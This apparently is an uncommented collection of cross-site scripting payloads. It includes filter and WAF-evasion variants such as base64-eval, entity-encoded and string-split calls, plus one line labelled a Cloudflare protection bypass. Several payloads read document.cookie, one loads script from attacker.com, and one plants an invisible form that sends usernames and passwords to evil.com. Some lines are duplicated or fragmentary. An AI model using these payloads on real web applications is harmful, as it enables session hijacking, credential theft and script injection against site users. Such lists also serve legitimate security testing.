fddffd#49
n_vis=xssx’*$.getScript//593.xss.ht//;
<a href="https://www.evil.com/">Click here </a>
“><a nope=”%26quot;x%26quot;”onmouseover=”Reflect.get(frames,’ale’+’rt’)(Reflect.get(document,’coo’+’kie’))”>
v3.0.1%3CsvG%20onLoad=prompt(1)%3E
“onmouseover=”alert(1)
\”-alert(2)}//
${alert(3)}
<img src=1 onerror=alert(document.domain)>
<><img src=1 onerror=alert(3)>
{{$on.constructor(‘alert(4)’)()}}
javascript:alert(document.cookie)
‘>”></title></style></textarea></script><script/src=attacker.com/js></script>
?msg=<img/src=%00%20onerror=this.onerror=confirm(6)
&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27
&toString().constructor.prototype.charAt%3d[].join;[7]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>
<svg/onload=eval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ==’))>
http://foo?'-alert(8)-'
“></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
</textarea><ScRiPt>prompt(/hack the planet/)</ScRiPt//
<iframe src="" onload="this.src+='<img src=x onerror=print()>'"></iframe>
%3Cscript%3Ealert%281%29%3C%2Fscript%3E&token=;script-src-elem%20%27unsafe-inline%27
“></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
</textarea><ScRiPt>prompt(/hack the planet/)</ScRiPt//
%22%3E%3C/script%3E%3Csvg%20onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)%3E%3C/textarea%3E%3CScRiPt%3Eprompt(document.cookie)%3C/ScRiPt//
dz7b’-prompt(1)-‘nrito
<object onerror=javascript:javascript:alert(1)>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(2);">]]</C><X></xml>
<iframe srcdoc="<iframe/srcdoc=<img/src=''onerror=javascript:alert(document.cookie)>>">
<image src=1 href=1 onerror="javascript:alert(1)"></image>
aE4ZO0UPECswAxliCzE
“><!’/“\’/\”/–></Script><Image SrcSet=K */; OnError=confirm(document.domain) //>#
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
“\/><img%20s+src+c=x%20on+onerror+%20=”alert(1)”>
<script>alert(document.getElementsByTagName(‘html’)[0].innerHTML.match(/‘([^’]%2b)/)[1])</script>
<script>alert(document.getElementsByTagName(‘html’)[0].innerHTML.match(/‘([^’]%2b)/)[document.domain])</script>
javascript:alert(document.domain)
</Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)>
<script>alert(document.head.innerHTML.substr(77, 97, 120));</script>
<iframe srcdoc='<body onload=prompt(51)>'>
<script>alert(document.domain)</script>
<object onerror=javascript:javascript:alert(1)>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(2);">]]</C><X></xml>
<iframe srcdoc="<iframe/srcdoc=<img/src=''onerror=javascript:alert(document.cookie)>>">
“><u>XSS Vulnerability</u><marquee+onstart=’alert(document.cookie)’>XSS
<img src="https://www.icegif.com/wp-content/uploads/2022/01/icegif-165.gif" width="500" height="600">
%3CA%20HREF%3d%22http%3a%2f%2fevil.com%22%3EClick%20Here%3C%2fA%3E
<form action="//evil.com" method="GET"><input type="text" name="u" style='opacity:0;'><input type="password" name="p" style='opacity:0;'><input type="submit" name="s" value="Load more content"> “
<script>
window.location=”https://“;
</script>
<%= sanitize “<svg><use href=\"data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEzMzcnIGhlaWdodD0nMTMzNyc+CjxpbWFnZSBocmVmPSIxIiBvbmVycm9yPSJhbGVydCh3aW5kb3cub3JpZ2luKSIgLz4KPC9zdmc+#x\"/></svg>“, tags: %w(svg use) %>
Cloudflare XSS Protection Bypass 👇
“%3e%3cImG%20sRC=X%20OneRRoR=alert(document.cookie)%20”%3c
“><Svg Only=1 OnLoad=confirm(atob(“Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ==”))>
xxxx”/>%3cbutton%20popovertarget=bugvsme%3eCLICK%20HERE%3c/button
<img src=x onerror=alert(1)>
